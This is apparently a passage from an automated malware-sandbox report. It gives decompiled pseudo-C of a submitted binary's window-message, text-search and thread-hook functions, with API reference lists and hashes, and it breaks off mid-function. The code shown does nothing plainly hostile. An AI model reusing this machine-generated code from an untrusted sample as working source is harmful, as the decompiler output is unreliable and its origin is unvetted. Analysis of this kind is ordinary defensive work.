                                                                                                                                                                                                                                                                                          0x000fca94
                                                                                                                                                                                                                                                                                          0x000fca9a
                                                                                                                                                                                                                                                                                          0x000fca9b
                                                                                                                                                                                                                                                                                          0x000fca9c
                                                                                                                                                                                                                                                                                          0x000fca9d
                                                                                                                                                                                                                                                                                          0x000fca9e
                                                                                                                                                                                                                                                                                          0x000fca9f
                                                                                                                                                                                                                                                                                          0x000fcaa0
                                                                                                                                                                                                                                                                                          0x000fca37
                                                                                                                                                                                                                                                                                          0x000fca37
                                                                                                                                                                                                                                                                                          0x000fca44
                                                                                                                                                                                                                                                                                          0x000fca47
                                                                                                                                                                                                                                                                                          0x000fca4d
                                                                                                                                                                                                                                                                                          0x000fca53
                                                                                                                                                                                                                                                                                          0x000fca5b
                                                                                                                                                                                                                                                                                          0x000fca61
                                                                                                                                                                                                                                                                                          0x000fca6e
                                                                                                                                                                                                                                                                                          0x000fca6f
                                                                                                                                                                                                                                                                                          0x000fca86
                                                                                                                                                                                                                                                                                          0x000fca71
                                                                                                                                                                                                                                                                                          0x000fca7a
                                                                                                                                                                                                                                                                                          0x000fca7a
                                                                                                                                                                                                                                                                                          0x000fca6f

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • GetActiveWindow.USER32 ref: 000FC9C1
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,00000000,?,00000000,?,000F71AB,00000000,?,?), ref: 000FC9D7
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(?,?,000F71AB,00000000,?,?), ref: 000FC9EA
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,?,00000001,?,000F71AB,00000000,?,?), ref: 000FC9F4
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(000F71AB,00000000,?,00000000,?,000F71AB,00000000,?,?), ref: 000FCA0C
                                                                                                                                                                                                                                                                                          • lstrlenA.KERNEL32(000F71AB,?,000F71AB,00000000,?,?), ref: 000FCA1F
                                                                                                                                                                                                                                                                                          • lstrcpynA.KERNEL32(?,000F71AB,00000001,?,000F71AB,00000000,?,?), ref: 000FCA29
                                                                                                                                                                                                                                                                                          • GetCurrentThreadId.KERNEL32 ref: 000FCA39
                                                                                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(00170C68,?,000F71AB,00000000,?,?), ref: 000FCA47
                                                                                                                                                                                                                                                                                          • LeaveCriticalSection.KERNEL32(00170C68,?,000F71AB,00000000,?,?), ref: 000FCA61
                                                                                                                                                                                                                                                                                          • FindTextA.COMDLG32(?,?,000F71AB), ref: 000FCA71
                                                                                                                                                                                                                                                                                          • ReplaceTextA.COMDLG32(?,?,000F71AB), ref: 000FCA7D
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: lstrlen$CriticalSectionTextlstrcpyn$ActiveCurrentEnterFindLeaveReplaceThreadWindow
                                                                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                                                                          • API String ID: 2015787953-0
                                                                                                                                                                                                                                                                                          • Opcode ID: 970a29b899c8de491e93ccaf7cf9abc7676cf6fadb452d80d8ffd4a70e166f64
                                                                                                                                                                                                                                                                                          • Instruction ID: 52cd20a771fcbbf2c24f0997ba586e0a45bb18a8bb1801a447d0cdb10f8f6d90
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 970a29b899c8de491e93ccaf7cf9abc7676cf6fadb452d80d8ffd4a70e166f64
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 9721D83190071DEBE3169F61EE8DFFA77A8FB08711F108115FA06D2910C7B4A8C09B51
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 84%
                                                                                                                                                                                                                                                                                          			E000FE0A0(void* __esi, int _a4, intOrPtr* _a8) {
                                                                                                                                                                                                                                                                                          				signed int _v8;
                                                                                                                                                                                                                                                                                          				intOrPtr _v12;
                                                                                                                                                                                                                                                                                          				intOrPtr _v16;
                                                                                                                                                                                                                                                                                          				intOrPtr _v20;
                                                                                                                                                                                                                                                                                          				void* _v24;
                                                                                                                                                                                                                                                                                          				struct tagRECT _v40;
                                                                                                                                                                                                                                                                                          				intOrPtr _v44;
                                                                                                                                                                                                                                                                                          				intOrPtr _v48;
                                                                                                                                                                                                                                                                                          				signed char _v52;
                                                                                                                                                                                                                                                                                          				intOrPtr _v56;
                                                                                                                                                                                                                                                                                          				void* _v60;
                                                                                                                                                                                                                                                                                          				void* _v64;
                                                                                                                                                                                                                                                                                          				intOrPtr* _v68;
                                                                                                                                                                                                                                                                                          				struct HWND__* _v72;
                                                                                                                                                                                                                                                                                          				void* __ebx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				signed int _t48;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t50;
                                                                                                                                                                                                                                                                                          				int _t56;
                                                                                                                                                                                                                                                                                          				signed char _t65;
                                                                                                                                                                                                                                                                                          				void* _t96;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t97;
                                                                                                                                                                                                                                                                                          				void* _t99;
                                                                                                                                                                                                                                                                                          				void* _t100;
                                                                                                                                                                                                                                                                                          				signed int _t102;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_t101 = __esi;
                                                                                                                                                                                                                                                                                          				_t48 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_v8 = _t48 ^ _t102;
                                                                                                                                                                                                                                                                                          				_t50 = _a8;
                                                                                                                                                                                                                                                                                          				_v68 = _t50;
                                                                                                                                                                                                                                                                                          				 *_t50 = 0;
                                                                                                                                                                                                                                                                                          				if(IsWindowEnabled( *(__esi + 0x5c)) == 0) {
                                                                                                                                                                                                                                                                                          					L12:
                                                                                                                                                                                                                                                                                          					_pop(_t96);
                                                                                                                                                                                                                                                                                          					return E001059E6(0, 0, _v8 ^ _t102, _t91, _t96, _t101);
                                                                                                                                                                                                                                                                                          				} else {
                                                                                                                                                                                                                                                                                          					_t97 =  *((intOrPtr*)(__esi + 4));
                                                                                                                                                                                                                                                                                          					_v72 = _t97;
                                                                                                                                                                                                                                                                                          					if(GetFocus() != _t97) {
                                                                                                                                                                                                                                                                                          						goto L12;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t56 = _a4;
                                                                                                                                                                                                                                                                                          						_v64 = 0;
                                                                                                                                                                                                                                                                                          						if(_t56 == 0xd) {
                                                                                                                                                                                                                                                                                          							L6:
                                                                                                                                                                                                                                                                                          							_v40.left = 0;
                                                                                                                                                                                                                                                                                          							_v40.top = 0;
                                                                                                                                                                                                                                                                                          							_v40.right = 0;
                                                                                                                                                                                                                                                                                          							_v40.bottom = 0;
                                                                                                                                                                                                                                                                                          							GetClientRect( *(_t101 + 4),  &_v40);
                                                                                                                                                                                                                                                                                          							_v20 = 0;
                                                                                                                                                                                                                                                                                          							_v16 = 0;
                                                                                                                                                                                                                                                                                          							_v12 = 0;
                                                                                                                                                                                                                                                                                          							_v24 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t101 + 4), 0x41d, _v64,  &_v24);
                                                                                                                                                                                                                                                                                          							_t91 =  *(_t101 + 4);
                                                                                                                                                                                                                                                                                          							_v56 = 0;
                                                                                                                                                                                                                                                                                          							_v52 = 0;
                                                                                                                                                                                                                                                                                          							_v48 = 0;
                                                                                                                                                                                                                                                                                          							_v44 = 0;
                                                                                                                                                                                                                                                                                          							_v60 = 0;
                                                                                                                                                                                                                                                                                          							SendMessageA( *(_t101 + 4), 0x417, _v64,  &_v60);
                                                                                                                                                                                                                                                                                          							_t65 = _v52;
                                                                                                                                                                                                                                                                                          							if((_t65 & 0x00000004) == 0 || (_t65 & 0x00000008) != 0 || _v16 > _v40.right) {
                                                                                                                                                                                                                                                                                          								MessageBeep(0);
                                                                                                                                                                                                                                                                                          								 *_v68 = 1;
                                                                                                                                                                                                                                                                                          								goto L12;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								PostMessageA( *(_t101 + 4), 0x100, 0x28, 0);
                                                                                                                                                                                                                                                                                          								if(_a4 == 0xd) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									SendMessageA( *(_t101 + 4), 0x448, _v64, 0);
                                                                                                                                                                                                                                                                                          									_pop(_t99);
                                                                                                                                                                                                                                                                                          									return E001059E6(0, 0, _v8 ^ _t102, _v64, _t99, _t101);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						} else {
                                                                                                                                                                                                                                                                                          							_t91 = _t56;
                                                                                                                                                                                                                                                                                          							if(SendMessageA(_v72, 0x44e, _t56,  &_v64) != 0) {
                                                                                                                                                                                                                                                                                          								goto L6;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								if(_a4 == 0x2f) {
                                                                                                                                                                                                                                                                                          									goto L12;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									MessageBeep(0);
                                                                                                                                                                                                                                                                                          									_pop(_t100);
                                                                                                                                                                                                                                                                                          									return E001059E6(0, 0, _v8 ^ _t102, _t91, _t100, __esi);
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          					}
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          			}




























                                                                                                                                                                                                                                                                                          0x000fe0a0
                                                                                                                                                                                                                                                                                          0x000fe0a6
                                                                                                                                                                                                                                                                                          0x000fe0ad
                                                                                                                                                                                                                                                                                          0x000fe0b0
                                                                                                                                                                                                                                                                                          0x000fe0b6
                                                                                                                                                                                                                                                                                          0x000fe0b9
                                                                                                                                                                                                                                                                                          0x000fe0c8
                                                                                                                                                                                                                                                                                          0x000fe1ef
                                                                                                                                                                                                                                                                                          0x000fe1f2
                                                                                                                                                                                                                                                                                          0x000fe200
                                                                                                                                                                                                                                                                                          0x000fe0ce
                                                                                                                                                                                                                                                                                          0x000fe0ce
                                                                                                                                                                                                                                                                                          0x000fe0d1
                                                                                                                                                                                                                                                                                          0x000fe0dc
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe0e2
                                                                                                                                                                                                                                                                                          0x000fe0e2
                                                                                                                                                                                                                                                                                          0x000fe0eb
                                                                                                                                                                                                                                                                                          0x000fe0f1
                                                                                                                                                                                                                                                                                          0x000fe12f
                                                                                                                                                                                                                                                                                          0x000fe139
                                                                                                                                                                                                                                                                                          0x000fe13c
                                                                                                                                                                                                                                                                                          0x000fe13f
                                                                                                                                                                                                                                                                                          0x000fe142
                                                                                                                                                                                                                                                                                          0x000fe145
                                                                                                                                                                                                                                                                                          0x000fe153
                                                                                                                                                                                                                                                                                          0x000fe156
                                                                                                                                                                                                                                                                                          0x000fe159
                                                                                                                                                                                                                                                                                          0x000fe167
                                                                                                                                                                                                                                                                                          0x000fe16a
                                                                                                                                                                                                                                                                                          0x000fe16f
                                                                                                                                                                                                                                                                                          0x000fe174
                                                                                                                                                                                                                                                                                          0x000fe177
                                                                                                                                                                                                                                                                                          0x000fe17a
                                                                                                                                                                                                                                                                                          0x000fe17d
                                                                                                                                                                                                                                                                                          0x000fe18b
                                                                                                                                                                                                                                                                                          0x000fe18e
                                                                                                                                                                                                                                                                                          0x000fe190
                                                                                                                                                                                                                                                                                          0x000fe195
                                                                                                                                                                                                                                                                                          0x000fe1e0
                                                                                                                                                                                                                                                                                          0x000fe1e9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe1a3
                                                                                                                                                                                                                                                                                          0x000fe1af
                                                                                                                                                                                                                                                                                          0x000fe1b9
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe1bb
                                                                                                                                                                                                                                                                                          0x000fe1c9
                                                                                                                                                                                                                                                                                          0x000fe1cd
                                                                                                                                                                                                                                                                                          0x000fe1dc
                                                                                                                                                                                                                                                                                          0x000fe1dc
                                                                                                                                                                                                                                                                                          0x000fe1b9
                                                                                                                                                                                                                                                                                          0x000fe0f3
                                                                                                                                                                                                                                                                                          0x000fe0f3
                                                                                                                                                                                                                                                                                          0x000fe108
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe10a
                                                                                                                                                                                                                                                                                          0x000fe10e
                                                                                                                                                                                                                                                                                          0x00000000
                                                                                                                                                                                                                                                                                          0x000fe114
                                                                                                                                                                                                                                                                                          0x000fe115
                                                                                                                                                                                                                                                                                          0x000fe11d
                                                                                                                                                                                                                                                                                          0x000fe12c
                                                                                                                                                                                                                                                                                          0x000fe12c
                                                                                                                                                                                                                                                                                          0x000fe10e
                                                                                                                                                                                                                                                                                          0x000fe108
                                                                                                                                                                                                                                                                                          0x000fe0f1
                                                                                                                                                                                                                                                                                          0x000fe0dc

                                                                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                                                                          • IsWindowEnabled.USER32(?), ref: 000FE0C0
                                                                                                                                                                                                                                                                                          • GetFocus.USER32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,000FC459,00000020), ref: 000FE0D4
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000044E,?,?), ref: 000FE104
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 000FE115
                                                                                                                                                                                                                                                                                          • GetClientRect.USER32 ref: 000FE145
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,0000041D,?,00000020), ref: 000FE16A
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000417,?,?), ref: 000FE18E
                                                                                                                                                                                                                                                                                          • PostMessageA.USER32 ref: 000FE1AF
                                                                                                                                                                                                                                                                                          • SendMessageA.USER32(?,00000448,?,00000000), ref: 000FE1C9
                                                                                                                                                                                                                                                                                          • MessageBeep.USER32(00000000), ref: 000FE1E0
                                                                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                                                                          • Source File: 00000000.00000002.711567392.00000000000F1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000F0000, based on PE: true
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.711475414.00000000000F0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000110000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712120214.0000000000120000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712610122.0000000000159000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.712714995.000000000015C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713013679.0000000000170000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          • Associated: 00000000.00000002.713099356.0000000000173000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_f0000_fs7AQcREFX.jbxd
                                                                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                                                                          • API ID: Message$Send$Beep$ClientEnabledFocusPostRectWindow
                                                                                                                                                                                                                                                                                          • String ID: /
                                                                                                                                                                                                                                                                                          • API String ID: 787769824-2043925204
                                                                                                                                                                                                                                                                                          • Opcode ID: 3b7873707c45edd87fe1763c4d17f863e74cf7a558b05cf9375d99227fb71e5b
                                                                                                                                                                                                                                                                                          • Instruction ID: 17122f43447e7cafb548ea796ba514a323f9de667ff157556c8985edd282ef88
                                                                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3b7873707c45edd87fe1763c4d17f863e74cf7a558b05cf9375d99227fb71e5b
                                                                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 824127B1E0020CAFDB54DFA9DD84AAEB7F9FB58300B10842AF949E7650E770A941CB50
                                                                                                                                                                                                                                                                                          Uniqueness

                                                                                                                                                                                                                                                                                          Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                          C-Code - Quality: 75%
                                                                                                                                                                                                                                                                                          			E000FDC90(int __edx, void* __eflags, long _a4, long _a8) {
                                                                                                                                                                                                                                                                                          				char _v0;
                                                                                                                                                                                                                                                                                          				void* _v8;
                                                                                                                                                                                                                                                                                          				long _v12;
                                                                                                                                                                                                                                                                                          				signed int _v16;
                                                                                                                                                                                                                                                                                          				signed int _v20;
                                                                                                                                                                                                                                                                                          				long _v24;
                                                                                                                                                                                                                                                                                          				long _v28;
                                                                                                                                                                                                                                                                                          				char _v32;
                                                                                                                                                                                                                                                                                          				struct _CRITICAL_SECTION* _v36;
                                                                                                                                                                                                                                                                                          				long _v48;
                                                                                                                                                                                                                                                                                          				intOrPtr _v52;
                                                                                                                                                                                                                                                                                          				char _v72;
                                                                                                                                                                                                                                                                                          				void* __ecx;
                                                                                                                                                                                                                                                                                          				void* __edi;
                                                                                                                                                                                                                                                                                          				void* __esi;
                                                                                                                                                                                                                                                                                          				signed int _t62;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t69;
                                                                                                                                                                                                                                                                                          				struct HWND__* _t70;
                                                                                                                                                                                                                                                                                          				long _t75;
                                                                                                                                                                                                                                                                                          				signed int _t76;
                                                                                                                                                                                                                                                                                          				long _t77;
                                                                                                                                                                                                                                                                                          				long _t85;
                                                                                                                                                                                                                                                                                          				struct HHOOK__* _t88;
                                                                                                                                                                                                                                                                                          				signed int _t91;
                                                                                                                                                                                                                                                                                          				long _t96;
                                                                                                                                                                                                                                                                                          				void* _t101;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t102;
                                                                                                                                                                                                                                                                                          				long _t105;
                                                                                                                                                                                                                                                                                          				long _t108;
                                                                                                                                                                                                                                                                                          				void* _t111;
                                                                                                                                                                                                                                                                                          				int _t112;
                                                                                                                                                                                                                                                                                          				int _t116;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t124;
                                                                                                                                                                                                                                                                                          				intOrPtr* _t129;
                                                                                                                                                                                                                                                                                          				long _t133;
                                                                                                                                                                                                                                                                                          				struct HHOOK__** _t136;
                                                                                                                                                                                                                                                                                          				int* _t141;
                                                                                                                                                                                                                                                                                          				long _t143;
                                                                                                                                                                                                                                                                                          				intOrPtr _t144;
                                                                                                                                                                                                                                                                                          				long _t146;
                                                                                                                                                                                                                                                                                          				void* _t149;
                                                                                                                                                                                                                                                                                          				signed int _t150;
                                                                                                                                                                                                                                                                                          				long _t157;
                                                                                                                                                                                                                                                                                          				long _t159;
                                                                                                                                                                                                                                                                                          
                                                                                                                                                                                                                                                                                          				_push(0xffffffff);
                                                                                                                                                                                                                                                                                          				_push(E0010F648);
                                                                                                                                                                                                                                                                                          				_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          				_t150 = _t149 - 0x14;
                                                                                                                                                                                                                                                                                          				_t62 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          				_push(_t62 ^ _t147);
                                                                                                                                                                                                                                                                                          				 *[fs:0x0] =  &_v16;
                                                                                                                                                                                                                                                                                          				_v20 = _t150;
                                                                                                                                                                                                                                                                                          				_t108 = _a4;
                                                                                                                                                                                                                                                                                          				_v28 = CallWindowProcA( *(_t108 + 0x40),  *(_t108 + 4), __edx, _t112, _a8);
                                                                                                                                                                                                                                                                                          				E001011F0(_t108);
                                                                                                                                                                                                                                                                                          				_t126 =  *(_t108 + 4);
                                                                                                                                                                                                                                                                                          				_t69 = GetParent( *(_t108 + 4));
                                                                                                                                                                                                                                                                                          				_t131 = _t69;
                                                                                                                                                                                                                                                                                          				_t70 = GetParent(_t69);
                                                                                                                                                                                                                                                                                          				while(_t70 != 0) {
                                                                                                                                                                                                                                                                                          					_t131 = _t70;
                                                                                                                                                                                                                                                                                          					_t70 = GetParent(_t70);
                                                                                                                                                                                                                                                                                          				}
                                                                                                                                                                                                                                                                                          				E00100820(_t131, _t108 + 0x5c);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_t108 + 4), 0x41e, 0x14, 0);
                                                                                                                                                                                                                                                                                          				SendMessageA( *(_t108 + 4), 0x430, 0, 0);
                                                                                                                                                                                                                                                                                          				_v36 = 0x170c68;
                                                                                                                                                                                                                                                                                          				_v8 = 0;
                                                                                                                                                                                                                                                                                          				EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          				_v32 = 1;
                                                                                                                                                                                                                                                                                          				_t157 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          				if(_t157 != 0) {
                                                                                                                                                                                                                                                                                          					L7:
                                                                                                                                                                                                                                                                                          					_t75 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          					_t141 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          					_t116 = _t141[2];
                                                                                                                                                                                                                                                                                          					_t133 = _t75;
                                                                                                                                                                                                                                                                                          					_t76 = 0;
                                                                                                                                                                                                                                                                                          					_v24 = _t133;
                                                                                                                                                                                                                                                                                          					if(_t116 <= 0) {
                                                                                                                                                                                                                                                                                          						L13:
                                                                                                                                                                                                                                                                                          						_t77 = 0;
                                                                                                                                                                                                                                                                                          						goto L17;
                                                                                                                                                                                                                                                                                          					} else {
                                                                                                                                                                                                                                                                                          						_t126 =  *_t141;
                                                                                                                                                                                                                                                                                          						while( *_t126 != _t133) {
                                                                                                                                                                                                                                                                                          							_t76 = _t76 + 1;
                                                                                                                                                                                                                                                                                          							_t126 = _t126 + 4;
                                                                                                                                                                                                                                                                                          							if(_t76 < _t116) {
                                                                                                                                                                                                                                                                                          								continue;
                                                                                                                                                                                                                                                                                          							} else {
                                                                                                                                                                                                                                                                                          								_t77 = 0;
                                                                                                                                                                                                                                                                                          								L17:
                                                                                                                                                                                                                                                                                          								_a8 = _t77;
                                                                                                                                                                                                                                                                                          								_t163 = _t77;
                                                                                                                                                                                                                                                                                          								if(_t77 != 0) {
                                                                                                                                                                                                                                                                                          									 *((intOrPtr*)(_t77 + 4)) =  *((intOrPtr*)(_t77 + 4)) + 1;
                                                                                                                                                                                                                                                                                          								} else {
                                                                                                                                                                                                                                                                                          									_push(8);
                                                                                                                                                                                                                                                                                          									_v8 = 3;
                                                                                                                                                                                                                                                                                          									_t85 = E001065FC(_t126, _t133, _t141, _t163);
                                                                                                                                                                                                                                                                                          									if(_t85 == 0) {
                                                                                                                                                                                                                                                                                          										_t143 = 0;
                                                                                                                                                                                                                                                                                          										_a8 = 0;
                                                                                                                                                                                                                                                                                          									} else {
                                                                                                                                                                                                                                                                                          										_t143 = _t85;
                                                                                                                                                                                                                                                                                          										 *_t85 = 0;
                                                                                                                                                                                                                                                                                          										 *(_t85 + 4) = 0;
                                                                                                                                                                                                                                                                                          										_a8 = _t143;
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          									_t88 = SetWindowsHookExA(3, E00100AF0,  *0x170c08, _t133);
                                                                                                                                                                                                                                                                                          									if(_t143 != 0) {
                                                                                                                                                                                                                                                                                          										_t166 = _t88;
                                                                                                                                                                                                                                                                                          										if(_t88 != 0) {
                                                                                                                                                                                                                                                                                          											 *_t143 = _t88;
                                                                                                                                                                                                                                                                                          											 *(_t143 + 4) = 1;
                                                                                                                                                                                                                                                                                          											E00101AF0( &_v24, _t166,  &_v24,  &_a8);
                                                                                                                                                                                                                                                                                          										}
                                                                                                                                                                                                                                                                                          									}
                                                                                                                                                                                                                                                                                          								}
                                                                                                                                                                                                                                                                                          								goto L24;
                                                                                                                                                                                                                                                                                          							}
                                                                                                                                                                                                                                                                                          							goto L44;
                                                                                                                                                                                                                                                                                          						}
                                                                                                                                                                                                                                                                                          						__eflags = _t76 - 0xffffffff;
                                                                                                                                                                                                                                                                                          						if(__eflags != 0) {
                                                                                                                                                                                                                                                                                          							__eflags = _t76;
                                                                                                                                                                                                                                                                                          							if(_t76 < 0) {
                                                                                                                                                                                                                                                                                          								L26:
                                                                                                                                                                                                                                                                                          								RaiseException(0xc000008c, 1, 0, 0);
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								asm("int3");
                                                                                                                                                                                                                                                                                          								_push(0xffffffff);
                                                                                                                                                                                                                                                                                          								_push(E0010F618);
                                                                                                                                                                                                                                                                                          								_push( *[fs:0x0]);
                                                                                                                                                                                                                                                                                          								_push(_t108);
                                                                                                                                                                                                                                                                                          								_push(_t141);
                                                                                                                                                                                                                                                                                          								_push(_t133);
                                                                                                                                                                                                                                                                                          								_t91 =  *0x159060; // 0x1f9a9bdf
                                                                                                                                                                                                                                                                                          								_push(_t91 ^ _t150);
                                                                                                                                                                                                                                                                                          								 *[fs:0x0] =  &_v72;
                                                                                                                                                                                                                                                                                          								_t144 = _v52;
                                                                                                                                                                                                                                                                                          								_t96 = CallWindowProcA( *(_t144 + 0x40),  *(_t144 + 4), _t126, _t116, _v48);
                                                                                                                                                                                                                                                                                          								__eflags =  *(_t144 + 0x84) & 0x00000002;
                                                                                                                                                                                                                                                                                          								_v48 = _t96;
                                                                                                                                                                                                                                                                                          								if(( *(_t144 + 0x84) & 0x00000002) == 0) {
                                                                                                                                                                                                                                                                                          									_v28 = 0x170c68;
                                                                                                                                                                                                                                                                                          									_v12 = 0;
                                                                                                                                                                                                                                                                                          									EnterCriticalSection(0x170c68);
                                                                                                                                                                                                                                                                                          									__eflags =  *0x171994;
                                                                                                                                                                                                                                                                                          									_v24 = 1;
                                                                                                                                                                                                                                                                                          									if( *0x171994 != 0) {
                                                                                                                                                                                                                                                                                          										_t111 = GetCurrentThreadId();
                                                                                                                                                                                                                                                                                          										_v0 = _t111;
                                                                                                                                                                                                                                                                                          										_t136 = E00101B70( &_v0, _t133, _t144);
                                                                                                                                                                                                                                                                                          										__eflags = _t136;
                                                                                                                                                                                                                                                                                          										if(_t136 != 0) {
                                                                                                                                                                                                                                                                                          											_t55 =  &(_t136[1]);
                                                                                                                                                                                                                                                                                          											 *_t55 = _t136[1] - 1;
                                                                                                                                                                                                                                                                                          											__eflags =  *_t55;
                                                                                                                                                                                                                                                                                          											if( *_t55 != 0) {
                                                                                                                                                                                                                                                                                          												L39:
                                                                                                                                                                                                                                                                                          												_t146 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          											} else {
                                                                                                                                                                                                                                                                                          												UnhookWindowsHookEx( *_t136);
                                                                                                                                                                                                                                                                                          												_t146 =  *0x171994; // 0x0
                                                                                                                                                                                                                                                                                          												_t124 =  *(_t146 + 8);
                                                                                                                                                                                                                                                                                          												_t101 = 0;
                                                                                                                                                                                                                                                                                          												__eflags = _t124;
                                                                                                                                                                                                                                                                                          												if(_t124 > 0) {
                                                                                                                                                                                                                                                                                          													_t129 =  *_t146;
                                                                                                                                                                                                                                                                                          													while(1) {
                                                                                                                                                                                                                                                                                          														__eflags =  *_t129 - _t111;
                                                                                                                                                                                                                                                                                          														if( *_t129 == _t111) {
                                                                                                                                                                                                                                                                                          															break;
                                                                                                                                                                                                                                                                                          														}
                                                                                                                                                                                                                                                                                          														_t101 = _t101 + 1;
                                                                                                                                                                                                                                                                                          														_t129 = _t129 + 4;
                                                                                                                                                                                                                                                                                          														__eflags = _t101 - _t124;
                                                                                                                                                                                                                                                                                          														if(_t101 < _t124) {
                                                                                                                                                                                                                                                                                          															continue;
                                                                                                                                                                                                                                                                                          														} else {
